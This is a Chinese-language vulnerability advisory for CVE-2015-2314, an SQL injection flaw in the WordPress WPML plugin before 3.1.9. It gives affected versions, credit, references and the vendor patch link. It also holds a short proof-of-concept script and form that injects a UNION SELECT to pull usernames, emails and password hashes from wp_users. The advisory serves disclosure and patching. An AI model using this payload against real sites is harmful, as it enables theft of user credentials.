WordPress WPML插件SQL注入漏洞(CVE-2015-2314)
发表日期:2015-03-19 13:39:56
WordPress WPML插件SQL注入漏洞(CVE-2015-2314)
CVE-ID:CVE-2015-2314
发布日期:2015-03-05
更新日期:2015-03-18
受影响系统:
WordPress WPML < 3.1.9
详细信息:
WPML是创建多语言WordPress站点使用的行业标准。
WPML 3.1.9之前版本在实现上存在sql注入漏洞,通过在comments/feed的wp-link-ajax操作中,发送构造的HTTP Referer标头里的lang参数,远程攻击者利用此漏洞可执行任意sql命令。
来源:
Jouko Pynnonen (jouko@iki.fi)
参考信息:
http://www.securityfocus.com/archive/1/archive/1/534862/100/0/threaded
测试方法:
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Jouko Pynnonen (jouko@iki.fi)提供了如下测试方法:
<script>
var union="select
user_login,1,user_email,2,3,4,5,6,user_pass,7,8,9,10,11,12 from
wp_users";
if (document.location.search.length < 2)
document.location.search="lang=xx\' UNION "+union+" -- -- ";
</script>
<form method=POST action="https://YOUR.WORDPRESS.BLOG/comments/feed">
<input type=hidden name=action value="wp-link-ajax">
<input type=submit>
</form>
解决办法:
厂商补丁:
WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://wpml.org/2015/03/wpml-security-update-bug-and-fix/